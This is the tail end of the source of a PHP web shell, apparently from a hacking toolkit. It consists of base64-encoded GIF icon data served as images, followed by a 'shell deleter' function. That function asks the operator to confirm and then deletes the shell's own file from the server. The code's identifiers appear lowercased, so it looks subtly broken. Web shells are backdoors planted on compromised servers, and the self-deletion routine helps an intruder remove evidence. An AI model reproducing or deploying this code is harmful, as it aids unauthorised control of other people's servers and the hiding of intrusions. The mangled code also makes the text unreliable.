"zdmamtmazjmamzmaaad//wd/zad/mqd/zgd/mwd/aadm/wdmzadmmqdmzgdmmwdmaacz/wczzaczm
qczzgczmwczaa" .
"bm/wbmzabmmqbmzgbmmwbmaaaz/wazzaazmqazzgazmwazaaaa/waazaaamqaazgaam+4aan0aals
aakoaaigaahca" .
"afuaaeqaaciaabeaaaduaaddaac7aacqaaciaab3aabvaabeaaaiaaaraaaa7gaa3qaauwaaqgaai
aaadwaavqaara" .
"aaigaaee7u7t3d3bu7u6qqqoiiihd3d1vvvurerciiihereqaaach+tlroaxmgyxj0iglzigluihr
ozsbwdwjsawmg" .
"zg9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqba
aakacwaaaaafa" .
"awaaaimqbjcctbqmdbgqgtdmqfaabdvgojemzi0khehburwrwomgndihwnavjhiqrjjhx/qvz5d+v
hafziwmmz8bgh" .
"ji9hxqtj4zfamzc1vpxjgkppn0y5cp04m6lpekcn5mxojelrqfy5tm36ngrpqv67op0km6rynkup/
gmq1mdamc1tdn" .
"36lijupwjr0psofyurmtjlhitbkqxcgaa7",
"sound"=>"r0lgodlhfaawamiaap////8zm8z//8zmzjmzmwyaadmzmwaaach+tlroaxmgyxj0iglz
igluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
cacwaaaaafaaw" .
"aaadayi63p4wnsnckoocyvwpb7fxfwmfwgh+dzpynndpnahcw9cvquj8tttrd+g5hmint7a0bpe4z
nf6hcqn0iryks" .
"0sdn9v0tsc0q4dq1shfrjebrq6fznn5co2jd4yfup7gnysexqlhbijigsjads=",
"script"=>"r0lgodlhfaawamiaap///8z//5mzmtmzmwaaaaaaaaaaaaaaach+tlroaxmgyxj0igl
zigluihrozsbwdwjsawmgzg" .
"9tywluliblzxzpbibidwdozxmsigtldmluaeblaxquy29tlcbtzxb0zw1izxigmtk5nqah+qqbaaa
bacwaaaaafaaw" .
"aaadzti6vpewdecrnso+atvpeddvirhvbjcsf8qrmiwobe2fvlrmcyz3o4pgkcdgvmgr0sgzoyvm0
dns/af7ggy1me" .
"16v9vxndynf89es2os00brcdw7dvddwe87fjmg+v9dnxbzyw8jads=");
header("content-type: image/gif");
echo(base64_decode($images[$img]));
die();
}

function kill(){ // shell deleter function

style();
echo("<form method='post'>");
echo("type 'confirm' to kill the shell:<br>\n<input type='text' name='ver'
action='$me&act=kill'>");
echo("<input type='submit' value='delete'>");
echo("</form>");
if(@$_post['ver'] == "confirm"){
$self = basename($_server['php_self']);
if(unlink($self)) echo("deleted");
else echo("failed");
}
}
die();
?>